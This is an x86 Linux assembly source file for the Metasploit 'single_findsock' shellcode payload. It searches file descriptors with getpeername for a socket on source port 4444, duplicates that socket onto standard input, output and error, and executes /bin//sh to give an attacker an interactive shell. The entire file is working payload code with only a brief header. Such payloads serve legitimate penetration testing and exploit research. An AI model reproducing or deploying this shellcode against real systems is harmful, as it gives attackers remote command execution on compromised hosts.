1
;;
2
;
3
;        Name: single_findsock
4
;   Platforms: Linux
5
;     Authors: vlad902 <vlad902 [at] gmail.com>
6
;     Authors: skape <mmiller [at] hick.org>
7
;     Version: $Revision: 1856 $
8
;     License:
9
;
10
;        This file is part of the Metasploit Exploit Framework
11
;        and is subject to the same licenses and copyrights as
12
;        the rest of this package.
13
;
14
; Description:
15
;
16
;        Search file descriptors based on source port.
17
;
18
;;
19

20
BITS 32
21

22
global main
23

24
main:
25
	xor	edx, edx
26
	push	edx
27
	mov	ebp, esp
28

29
	push	byte 0x07
30
	pop	ebx
31

32
	push	byte 0x10
33
	push	esp
34
	push	ebp
35
	push	edx
36

37
	mov	ecx, esp
38
getpeername_loop:
39
	inc	dword [ecx]
40

41
	push	byte 0x66
42
	pop	eax
43
	int	0x80
44

45
	cmp	word [ebp + 2], 0x5c11
46
	jne	getpeername_loop
47

48
	pop	ebx
49
	push	byte 0x02
50
	pop	ecx
51

52
dup2_loop:
53
	mov	al, 0x3f
54
	int	0x80
55
	dec	ecx
56
	jns	dup2_loop
57

58
	push	edx
59
	push	dword 0x68732f2f
60
	push	dword 0x6e69622f
61
	mov	ebx, esp
62

63
	push	edx
64
	push	ebx
65
	mov	ecx, esp
66

67
	mov	al, 0x0b
68
	int	0x80
69

70